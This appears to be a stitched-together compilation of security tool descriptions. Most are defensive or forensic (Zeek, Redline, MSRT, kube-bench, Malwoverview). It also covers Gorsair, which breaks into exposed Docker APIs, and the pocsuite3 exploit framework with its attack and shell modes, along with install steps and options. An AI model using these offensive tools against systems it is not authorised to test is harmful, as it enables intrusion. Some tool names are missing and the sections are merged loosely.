A powerful framework for network traffic analysis and security monitoring.Bro is a passive, open-source network traffic analyzer. It is
primarily a security monitor that inspects all traffic on a link in
depth for signs of suspicious activity. More generally, however,
Bro supports a wide range of traffic analysis tasks even outside of
the security domain, including performance measurements and helping
with trouble-shooting.
Note that "Zeek" is the
new name of what used to be known as the "Bro" network security monitoring system.
Key Features
In-depth Analysis
Zeek ships with analyzers for many protocols, enabling high-level semantic
analysis at the application layer.
Adaptable and Flexible
Zeek's domain-specific scripting language enables site-specific monitoring
policies and means that it is not restricted to any particular detection
approach.
Efficient
Zeek targets high-performance networks and is used operationally at a variety
of large sites.
Highly Stateful
Zeek keeps extensive application-layer state about the network it monitors
and provides a high-level archive of a network's activity.
Two best tools to do the triage analysis , once the system is suspect for compromise.
Redline - FireEye
CrowdResponse - CrowdStrike
Redline:
FireEye's premier free endpoint security tool, provides
host investigative capabilities to users to find signs of malicious
activity through memory and file analysis and the development of a
threat assessment profile.
With Redline, you can:
Thoroughly audit and collect all running processes and drivers
from memory, file-system metadata, registry data, event logs,
network information, services, tasks and web history.
Analyze and view imported audit data, including the ability to
filter results around a given timeframe using Redline’s Timeline
functionality with the TimeWrinkle™ and TimeCrunch™ features.
Streamline memory analysis with a proven workflow for analyzing
malware based on relative priority.
Perform Indicators of
Compromise (IOC) analysis. Supplied with a set of IOCs, the Redline
Portable Agent is automatically configured to gather the data
required to perform the IOC analysis and an IOC hit result
review.
Redline version 1.20.2 introduces support for large file and
registry audits. Redline has also been improved to address issues
related to efficiency and memory management.
Supported Operating Systems: Windows XP, Windows Vista,
Windows 7, Windows 8 (32-bit and 64-bit), Windows 10
There is no installer for this tool. Simply unzip the contents of the
downloaded ZIP file into a location of your choosing and launch it
directly from there. Similarly for uninstalling; simply delete the
file(s) you extracted by moving them to the Recycle Bin or permanently
deleting them. It is possible there may be a very small number of
elements that remain in the Registry.
There can be safely ignored or
manually deleted by using a registry editing tool (e.g. regedit) and navigating to HKEY_LOCAL_MACHINE\Software\\CrowdStrike or HKEY_CURRENT_USER\Software\CrowdStrike and noting the name of the tool there and removing the branch.
helps keep Windows
computers free from prevalent malware. MSRT finds and removes threats
and reverses the changes made by these threats. MSRT is generally
released monthly as part of Windows Update or as a standalone tool
available here for download.
Use this tool:
If you have automatic updates for Windows turned off. Windows Update automatically downloads and runs MSRT in the background.
If you suspect an infection from prevalent malware families
is a scan tool designed to find and remove
malware from Windows computers. Simply download it and run a scan to
find malware and try to reverse changes made by identified threats.
Safety Scanner only scans when manually triggered and is available for
use 10 days after being downloaded. We recommend that you always
download the latest version of this tool before each scan.
is an open-source tool that hunts for security issues in
your Kubernetes clusters. It’s designed to increase awareness and
visibility of the security controls in Kubernetes environments.
kube-hunter is available as a container (aquasec/kube-hunter), and we also offer a web site at kube-hunter.aquasec.com
where you can register online to receive a token allowing you see and
share the results online. You can also run the Python code yourself as
described below.
is a Go application that checks whether Kubernetes is deployed securely by running the checks documented in the CIS Kubernetes Benchmark.
"An objective, consensus-driven security guideline for the Kubernetes Server Software."
Note that it is impossible to inspect the master nodes of managed
clusters, e.g. GKE, EKS and AKS, using kube-bench as one does not have
access to such nodes, although it is still possible to use kube-bench to
check worker node configuration in these environments.
Tests are configured with YAML files, making this tool easy to update as test specifications evolve.
Sample Output:
CIS Kubernetes Benchmark support
kube-bench supports the tests for Kubernetes as defined in the CIS Benchmarks 1.0.0 to 1.4.0 respectively.
CIS Kubernetes Benchmark
kube-bench config
Kubernetes versions
1.0.0
1.6
1.6
1.1.0
1.7
1.7
1.2.0
1.8
1.8-1.10
1.3.0
1.11
1.11-1.12
1.4.0
1.13
1.13-
By default kube-bench will determine the test set to run based on the Kubernetes version running on the machine.
Malware Analysis tools was to developed to provide students with a comprehensive hands-on exposure to the processes, tools and procedures used to identify common types of malware and to quickly determine their capabilities and threat level.
The new 1.6.0 version of MALWOVERVIEW tool is finally available!
Malwoverview.py is a first response tool to perform an initial and quick triage on either a directory containing malware samples, specific malware sample or even a suspect URL.
https://github.com/alexandreborges/malwoverview This version: * It is using the Hybrid Analysis API version 2.4.0. * Includes certificate information in the Hybrid Analysis report. * Includes MITRE information in the Hybrid Analysis report. * Includes an option to download samples from Hybrid Analysis.
is a penetration testing tool for discovering and remotely
accessing Docker APIs from vulnerable Docker containers. Once it has
access to the docker daemon, you can use Gorsair to directly execute
commands on remote containers.
Gorsair hacks its way into remote docker containers that expose their APIs.
Exposing the docker API on the internet is a tremendous risk, as it
can let malicious agents get information on all of the other containers,
images and system, as well as potentially getting privileged access to
the whole system if the image uses the root user.
Install
From a release
Set the:
GORSAIR_VERSION to whatever release you are interested in
OS to your operating system (linux, windows or darwin)
ARCH to your architecture (amd64, arm, or ppc64le)
And then run the following command to install gorsair. curl https://github.com/Ullaakut/Gorsair/releases/download/$GORSAIR_VERSION/gorsair_$OS_$ARCH --output /usr/local/bin/gorsair
From the sources
Make sure that you have a go version that supports modules (versions 1.11 and above)
Make sure that your environment contains the GO111MODULE variable set to on
Run go build -o /usr/local/bin/gorsair cmd/*.go from the root of this repository
Command line options
-t, --targets: Set targets according to the nmap target format. Required. Example: --targets="192.168.1.72,192.168.1.74"
-p, --ports: (Default: 2375,2376) Set custom ports.
-s, --speed: (Default: 4)
Set custom nmap discovery presets to improve speed or accuracy. It's
recommended to lower it if you are attempting to scan an unstable and
slow network, or to increase it if on a very performant and reliable
network. You might also want to keep it low to keep your discovery
stealthy. See this for more info on the nmap timing templates.
is an open-sourced remote vulnerability testing and proof-of-concept development framework developed by the Knownsec 404 Team.
It comes with a powerful proof-of-concept engine, many niche features
for the ultimate penetration testers and security researchers.
Features
PoC scripts can running with `attack`,`verify`, `shell` mode in different way
Plugin ecosystem
Dynamic loading PoC script from any where (local file, redis , database, Seebug ...)
Load multi-target from any where (CIDR, local file, redis , database, Zoomeye ...)
Results can be easily exported
Dynamic patch and hook requests
Both command line tool and python package import to use
IPV6 support
Global HTTP/HTTPS/SOCKS proxy support
Simple spider API for PoC script to use
Integrate with [Seebug](https://www.seebug.org) (for load PoC from Seebug website)
Integrate with [ZoomEye](https://www.zoomeye.org) (for load target from ZoomEye `Dork`)
Integrate with [Ceye](http://ceye.io/) (for verify blind DNS and HTTP request)
More ...
Functions
Vulnerability Testing Framework
Written in Python and supported both validation and exploitation two
plugin-invoked modes, Pocsuite could import batch targets from files and
test those targets against multiple exploit-plugins in advance.(See "Pocsuite usage")
PoC/Exp Development Kit
Like Metasploit, it is a development kit for pentesters to develope
their own exploits. Based on Pocsuite, you can write the most core code
of PoC/Exp without caring about the resulting output etc. There are at
least several hundred people writing PoC/Exp based on Pocsuite up to
date.
Integratable Module
Users could utilize some auxiliary modules packaged in Pocsuite to
extend their exploit functions or integrate Pocsuite to develop other
vulnerability assesment tools.
Integrated ZoomEye And Seebug APIs
Pocsuite is also an extremely useful tool to integrate Seebug and
ZoomEye APIs in a collaborative way. Vulnerablity assessment can be done
automatically and effectively by searching targets through ZoomEye and
acquiring PoC scripts from Seebug or locally.
Installation
pocsuite3 works out of the box with Python version 3.x on any platform.
You can use Git to clone the latest source code repository
$ git clone git@github.com:knownsec/pocsuite3.git
Or click here to download the latest source zip package, and extract